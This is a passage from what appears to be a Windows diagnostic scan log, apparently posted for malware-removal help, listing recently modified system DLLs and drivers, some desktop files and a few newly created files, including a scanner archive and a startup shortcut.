000,067,584 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\powercfg.exe [2014-05-14 16:00:36 | 000,136,192 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\diskpart.exe [2014-05-14 16:00:35 | 001,445,616 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\webservices.dll [2014-05-14 16:00:35 | 000,156,672 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\slc.dll [2014-05-14 16:00:35 | 000,123,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sppc.dll [2014-05-14 16:00:34 | 000,041,472 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\f3ahvoas.dll [2014-05-14 16:00:34 | 000,034,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\dataclen.dll [2014-05-14 16:00:33 | 001,727,760 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ntdll.dll [2014-05-14 16:00:33 | 000,530,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\AppReadiness.dll [2014-05-14 16:00:33 | 000,349,696 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bcdedit.exe [2014-05-14 16:00:33 | 000,232,448 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\InputSwitch.dll [2014-05-14 16:00:32 | 000,874,496 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\autofmt.exe [2014-05-14 16:00:32 | 000,704,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Security.Authentication.OnlineId.dll [2014-05-14 16:00:32 | 000,286,720 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wlidcredprov.dll [2014-05-14 16:00:32 | 000,198,656 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wpnprv.dll [2014-05-14 16:00:32 | 000,095,744 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\IdCtrls.dll [2014-05-14 16:00:32 | 000,089,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\RestoreOptIn.exe [2014-05-14 16:00:32 | 000,043,408 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\CloudNotifications.exe [2014-05-14 16:00:31 | 000,825,344 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\samsrv.dll [2014-05-14 16:00:31 | 000,586,240 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\qedit.dll [2014-05-14 16:00:31 | 000,260,608 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\BioCredProv.dll [2014-05-14 16:00:31 | 000,184,320 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\deviceaccess.dll [2014-05-14 16:00:31 | 000,110,592 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\samlib.dll [2014-05-14 16:00:30 | 000,653,312 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DismApi.dll [2014-05-14 16:00:30 | 000,463,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\RASMM.dll [2014-05-14 16:00:30 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winsrv.dll [2014-05-14 16:00:30 | 000,143,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\BootMenuUX.dll [2014-05-14 16:00:30 | 000,033,280 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\BasicRender.sys [2014-05-14 16:00:30 | 000,027,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\pl-PL\fvevol.sys.mui [2014-05-14 16:00:30 | 000,018,432 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WofUtil.dll [2014-05-14 16:00:27 | 000,249,856 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\rascustom.dll [2014-05-14 16:00:27 | 000,208,384 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.ApplicationModel.Store.dll [2014-05-14 16:00:26 | 000,745,328 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\oleaut32.dll [2014-05-14 16:00:26 | 000,484,864 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\untfs.dll [2014-05-14 16:00:26 | 000,079,192 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\sdstor.sys [2014-05-14 16:00:24 | 000,233,472 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.HumanInterfaceDevice.dll [2014-05-14 16:00:24 | 000,155,648 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\MicrosoftAccountTokenProvider.dll [2014-05-14 16:00:24 | 000,138,752 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\DWWIN.EXE [2014-05-14 16:00:23 | 001,057,792 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\printui.dll [2014-05-14 16:00:23 | 000,890,880 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\autochk.exe [2014-05-14 16:00:23 | 000,835,584 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\rasgcw.dll [2014-05-14 16:00:23 | 000,619,520 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\UserLanguagesCpl.dll [2014-05-14 16:00:23 | 000,074,752 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Sockets.PushEnabledApplication.dll [2014-05-14 16:00:22 | 000,459,264 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSync.dll [2014-05-14 16:00:22 | 000,094,720 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\spcompat.dll [2014-05-14 16:00:22 | 000,018,432 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\energytask.dll [2014-05-14 16:00:20 | 000,275,456 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\authz.dll [2014-05-14 16:00:20 | 000,128,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\CloudStorageWizard.exe [2014-05-14 16:00:20 | 000,121,856 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SkyDriveShell.dll [2014-05-14 16:00:19 | 000,709,120 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\msctfuimanager.dll [2014-05-14 16:00:19 | 000,569,856 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wpncore.dll [2014-05-14 16:00:19 | 000,561,664 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\dfrgui.exe [2014-05-14 16:00:19 | 000,518,144 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\MrmIndexer.dll [2014-05-14 16:00:19 | 000,112,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\scavengeui.dll [2014-05-14 16:00:19 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\JavaScriptCollectionAgent.dll [2014-05-14 16:00:19 | 000,028,160 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\f3ahvoas.dll [2014-05-14 16:00:18 | 008,946,688 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\glcndFilter.dll [2014-05-14 16:00:18 | 000,467,456 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\srcore.dll [2014-05-14 16:00:18 | 000,271,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\rstrui.exe [2014-05-14 16:00:18 | 000,070,656 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\srclient.dll [2014-05-14 16:00:17 | 001,927,600 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\combase.dll [2014-05-14 16:00:17 | 001,000,424 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WinTypes.dll [2014-05-14 16:00:17 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Security.Authentication.OnlineId.dll [2014-05-14 16:00:17 | 000,355,328 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wincorlib.dll [2014-05-14 16:00:17 | 000,308,224 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\srchadmin.dll [2014-05-14 16:00:17 | 000,185,856 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wlidcredprov.dll [2014-05-14 16:00:17 | 000,115,712 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winbici.dll [2014-05-14 16:00:16 | 012,027,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Data.Pdf.dll [2014-05-14 16:00:16 | 001,435,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sppobjs.dll [2014-05-14 16:00:16 | 000,488,448 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\qedit.dll [2014-05-14 16:00:16 | 000,226,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\BthLEEnum.sys [2014-05-14 16:00:16 | 000,147,968 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\deviceaccess.dll [2014-05-14 16:00:15 | 000,592,896 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\sud.dll [2014-05-14 16:00:15 | 000,269,824 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bisrv.dll [2014-05-14 16:00:14 | 000,721,408 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\twinapi.dll [2014-05-14 16:00:13 | 001,258,496 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\RacEngn.dll [2014-05-14 16:00:13 | 000,244,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sppwinob.dll [2014-05-14 16:00:12 | 000,155,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.HumanInterfaceDevice.dll [2014-05-14 16:00:12 | 000,116,736 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\MicrosoftAccountTokenProvider.dll [2014-05-14 16:00:12 | 000,027,648 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSyncPolicy.dll [2014-05-14 16:00:11 | 000,275,456 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Dism.exe [2014-05-14 16:00:10 | 002,843,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\actxprxy.dll [2014-05-14 16:00:10 | 000,289,752 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sqmapi.dll [2014-05-14 16:00:10 | 000,051,712 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\ConfigureExpandedStorage.dll [2014-05-14 16:00:10 | 000,014,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\clrhost.dll [2014-05-14 16:00:09 | 000,878,592 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ActionCenter.dll [2014-05-14 16:00:04 | 000,752,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\tdh.dll [2014-05-14 16:00:04 | 000,397,824 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sharemediacpl.dll [2014-05-14 16:00:02 | 000,504,832 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DevicePairing.dll [2014-05-14 16:00:02 | 000,203,776 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\PlayToDevice.dll [2014-05-14 16:00:02 | 000,177,664 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\easwrt.dll [2014-05-14 16:00:01 | 000,388,096 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ninput.dll [2014-05-14 16:00:00 | 000,068,096 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\setbcdlocale.dll [2014-05-14 15:59:59 | 001,374,384 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\combase.dll [2014-05-14 15:59:59 | 000,897,024 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\sdclt.exe [2014-05-14 15:59:59 | 000,506,120 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\WinTypes.dll [2014-05-14 15:59:59 | 000,336,232 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\bcryptprimitives.dll [2014-05-14 15:59:59 | 000,256,000 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\wincorlib.dll [2014-05-14 15:59:59 | 000,152,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bcrypt.dll [2014-05-14 15:59:58 | 000,791,552 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\uDWM.dll [2014-05-14 15:59:58 | 000,336,384 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\MbaeApiPublic.dll [2014-05-14 15:59:57 | 000,060,416 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\offreg.dll [2014-05-14 15:59:57 | 000,054,816 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\wpcfltr.sys [2014-05-14 15:59:55 | 002,288,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SyncCenter.dll [2014-05-14 15:59:52 | 000,556,032 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\twinapi.dll [2014-05-14 15:59:51 | 002,760,704 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wpccpl.dll [2014-05-14 15:59:51 | 001,640,960 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.UI.Immersive.dll [2014-05-14 15:59:51 | 001,341,440 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\dui70.dll [2014-05-14 15:59:51 | 000,159,744 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\thumbcache.dll [2014-05-14 15:59:51 | 000,029,912 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\UserAccountBroker.exe [2014-05-14 15:59:50 | 001,653,352 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WindowsCodecs.dll [2014-05-14 15:59:50 | 001,008,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WlanMM.dll [2014-05-14 15:59:50 | 000,112,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\fsutil.exe [2014-05-14 15:59:49 | 000,316,416 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winsku.dll [2014-05-14 15:59:49 | 000,113,152 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\shsetup.dll [2014-05-14 15:59:49 | 000,059,392 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\StorageContextHandler.dll [2014-05-14 15:59:49 | 000,036,352 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winbrand.dll [2014-05-14 15:59:49 | 000,014,848 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\slpts.dll [2014-05-14 15:59:47 | 000,100,197 | ---- | M] () -- C:\windows\SysWow64\RacRules.xml [2014-05-14 15:59:46 | 000,517,120 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSyncHost.exe [2014-05-14 15:59:46 | 000,135,168 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\netid.dll [2014-05-14 15:59:46 | 000,092,160 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WindowsAnytimeUpgradeResults.exe [2014-05-14 15:59:45 | 001,519,520 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\user32.dll [2014-05-14 15:59:45 | 000,390,656 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DfpCommon.dll [2014-05-14 15:59:45 | 000,262,335 | ---- | M] () -- C:\windows\SysNative\dfpinc.dat [2014-05-14 15:59:45 | 000,140,288 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\easwrt.dll [2014-05-14 15:59:45 | 000,031,232 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dfp.exe [2014-05-14 15:59:44 | 000,144,384 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\rpchttp.dll [2014-05-14 15:59:43 | 002,811,392 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\themeui.dll [2014-05-14 15:59:43 | 000,461,176 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WerFault.exe [2014-05-14 15:59:43 | 000,407,536 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Faultrep.dll [2014-05-14 15:59:43 | 000,307,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wintrust.dll [2014-05-14 15:59:43 | 000,102,912 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wcmcsp.dll [2014-05-14 15:59:43 | 000,036,200 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\WerFaultSecure.exe [2014-05-14 15:59:42 | 000,615,936 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\rdbui.dll [2014-05-14 15:59:42 | 000,366,080 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wcmsvc.dll [2014-05-14 15:59:42 | 000,359,936 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\vmrdvcore.dll [2014-05-14 15:59:42 | 000,273,408 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dmdskmgr.dll [2014-05-14 15:59:42 | 000,251,904 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\MbaeApiPublic.dll [2014-05-14 15:59:42 | 000,099,840 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\AuthBroker.dll [2014-05-14 15:59:41 | 000,173,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\syncui.dll [2014-05-14 15:59:41 | 000,162,816 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ocsetapi.dll [2014-05-14 15:59:41 | 000,137,216 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\PlayToManager.dll [2014-05-14 15:59:40 | 000,562,176 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\winlogon.exe [2014-05-14 15:59:40 | 000,322,048 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\fhcpl.dll [2014-05-14 15:59:39 | 001,496,576 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.UI.Immersive.dll [2014-05-14 15:59:39 | 001,132,032 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Globalization.dll [2014-05-14 15:59:39 | 000,546,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\AppxPackaging.dll [2014-05-14 15:59:39 | 000,323,584 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\GlobCollationHost.dll [2014-05-14 15:59:39 | 000,173,056 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\werui.dll [2014-05-14 15:59:39 | 000,156,160 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aitagent.exe [2014-05-14 15:59:39 | 000,151,384 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\dumpsd.sys [2014-05-14 15:59:39 | 000,094,560 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\bcd.dll [2014-05-14 15:59:38 | 000,236,888 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\sdbus.sys [2014-05-14 15:59:38 | 000,151,040 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\dmvdsitf.dll [2014-05-14 15:59:38 | 000,032,088 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ploptin.dll [2014-05-14 15:59:38 | 000,012,288 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\clrhost.dll [2014-05-14 15:59:37 | 000,477,744 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SHCore.dll [2014-05-14 15:59:37 | 000,321,536 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\stobject.dll [2014-05-14 15:59:37 | 000,146,776 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\msgpioclx.sys [2014-05-14 15:59:31 | 001,967,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\inetcpl.cpl [2014-05-14 15:59:31 | 000,242,688 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\mdmregistration.dll [2014-05-14 15:59:31 | 000,142,576 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\smss.exe [2014-05-14 15:59:31 | 000,079,872 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\powercfg.exe [2014-05-14 15:59:29 | 000,283,136 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wbadmin.exe [2014-05-14 15:59:29 | 000,195,584 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\PkgMgr.exe [2014-05-14 15:59:29 | 000,123,448 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dwmapi.dll [2014-05-14 15:59:29 | 000,109,056 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SSShim.dll [2014-05-14 15:59:29 | 000,079,496 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\bcd.dll [2014-05-14 15:59:29 | 000,068,096 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\spbcd.dll [2014-05-14 15:59:29 | 000,054,272 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\watchdog.sys [2014-05-14 15:59:28 | 000,105,864 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ncryptsslp.dll [2014-05-14 15:59:28 | 000,097,280 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\migisol.dll [2014-05-14 15:59:27 | 001,163,264 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\uxtheme.dll [2014-05-14 15:59:27 | 000,316,416 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\BioCredProv.dll [2014-05-14 15:59:27 | 000,275,312 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\powrprof.dll [2014-05-14 15:59:27 | 000,213,504 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\cleanmgr.exe [2014-05-14 15:59:27 | 000,146,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\korwbrkr.dll [2014-05-14 15:59:26 | 000,299,008 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.ApplicationModel.Store.dll [2014-05-14 15:59:26 | 000,146,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\diskpart.exe [2014-05-14 15:59:26 | 000,066,048 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\iesetup.dll [2014-05-14 15:59:26 | 000,033,792 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\iernonce.dll [2014-05-14 15:59:26 | 000,018,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\vhdparser.sys [2014-05-14 15:59:25 | 002,825,216 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\ExplorerFrame.dll [2014-05-14 15:59:25 | 000,792,576 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Globalization.dll [2014-05-14 15:59:25 | 000,761,792 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\iuilp.dll [2014-05-14 15:59:25 | 000,202,240 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\GlobCollationHost.dll [2014-05-14 15:59:25 | 000,050,176 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\UXInit.dll [2014-05-14 15:59:24 | 001,077,944 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\webservices.dll [2014-05-14 15:59:24 | 000,095,232 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\sppc.dll [2014-05-14 15:59:24 | 000,039,936 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\dataclen.dll [2014-05-14 15:59:23 | 000,669,896 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\advapi32.dll [2014-05-14 15:59:23 | 000,469,504 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\taskeng.exe [2014-05-14 15:59:23 | 000,372,568 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\storport.sys [2014-05-14 15:59:23 | 000,160,256 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\DWWIN.EXE [2014-05-14 15:59:23 | 000,132,608 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mssprxy.dll [2014-05-14 15:59:23 | 000,054,784 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\fveskybackup.dll [2014-05-14 15:59:22 | 003,494,912 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\tquery.dll [2014-05-14 15:59:22 | 002,368,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mssrch.dll [2014-05-14 15:59:22 | 000,752,640 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mssvp.dll [2014-05-14 15:59:22 | 000,441,344 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mssph.dll [2014-05-14 15:59:22 | 000,320,000 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SearchProtocolHost.exe [2014-05-14 15:59:22 | 000,194,560 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SearchFilterHost.exe [2014-05-14 15:59:22 | 000,013,824 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\msshooks.dll [2014-05-14 15:59:21 | 001,185,280 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\printui.dll [2014-05-14 15:59:21 | 000,492,032 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\PrintDialogs.dll [2014-05-14 15:59:21 | 000,101,216 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\RestoreOptIn.exe [2014-05-14 15:59:20 | 001,152,512 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wscui.cpl [2014-05-14 15:59:20 | 000,780,288 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\autofmt.exe [2014-05-14 15:59:20 | 000,559,104 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Connectivity.dll [2014-05-14 15:59:20 | 000,470,016 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\timedate.cpl [2014-05-14 15:59:20 | 000,384,856 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\drivers\spaceport.sys [2014-05-14 15:59:20 | 000,164,352 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\wscinterop.dll [2014-05-14 15:59:20 | 000,041,320 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\CloudNotifications.exe [2014-05-14 15:59:19 | 000,248,832 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\srrstr.dll [2014-05-14 15:59:17 | 000,459,776 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\DismApi.dll [2014-05-14 15:59:17 | 000,236,544 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\vdsbas.dll [2014-05-14 15:59:17 | 000,226,304 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SndVolSSO.dll [2014-05-14 15:59:17 | 000,210,736 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SndVol.exe [2014-05-14 15:59:17 | 000,193,024 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\bthprops.cpl [2014-05-14 15:59:17 | 000,130,560 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\SettingMonitor.dll [2014-05-14 15:59:16 | 000,755,200 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\msctfuimanager.dll [2014-05-14 15:59:16 | 000,545,280 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\untfs.dll [2014-05-14 15:59:16 | 000,468,480 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettings.Handlers.dll [2014-05-14 15:59:15 | 002,706,432 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\gameux.dll [2014-05-14 15:59:15 | 000,935,424 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\rasgcw.dll [2014-05-14 15:59:14 | 000,191,488 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\InputSwitch.dll [2014-05-14 14:06:38 | 000,233,912 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mfps.dll [2014-05-13 20:55:38 | 000,151,583 | ---- | M] () -- C:\Users\Marcin\Desktop\Plan sesji egzaminacyjnej zima-2013-2014.pdf [2014-05-13 20:55:37 | 000,139,340 | ---- | M] () -- C:\Users\Marcin\Desktop\Harmonogram egzaminów w SPNJO 2013-2014.pdf [2014-05-13 20:48:07 | 000,001,007 | ---- | M] () -- C:\Users\Marcin\Desktop\Texmaker.lnk [2014-05-13 20:17:37 | 171,108,104 | ---- | M] (MiKTeX.org) -- C:\Users\Marcin\Desktop\basic-miktex-2.9.5105.exe [2014-05-13 18:40:00 | 000,018,960 | ---- | M] (Logitech, Inc.) -- C:\windows\SysNative\drivers\LNonPnP.sys [2014-05-12 18:06:34 | 008,731,068 | ---- | M] () -- C:\Users\Marcin\Desktop\GodFatherSountrack.wav [2014-05-12 17:10:50 | 000,745,651 | ---- | M] () -- C:\Users\Marcin\Desktop\IMG_0004.jpg [2014-05-06 05:00:47 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\mshtmled.dll [2014-05-06 04:10:52 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\windows\SysWow64\mshtmled.dll [2 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ] [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014-06-04 11:41:42 | 000,370,943 | ---- | C] () -- C:\Users\Marcin\Desktop\gmer.zip [2014-06-04 11:07:21 | 000,001,041 | ---- | C] () -- C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sidebar383.lnk [2014-06-03 20:45:36 | 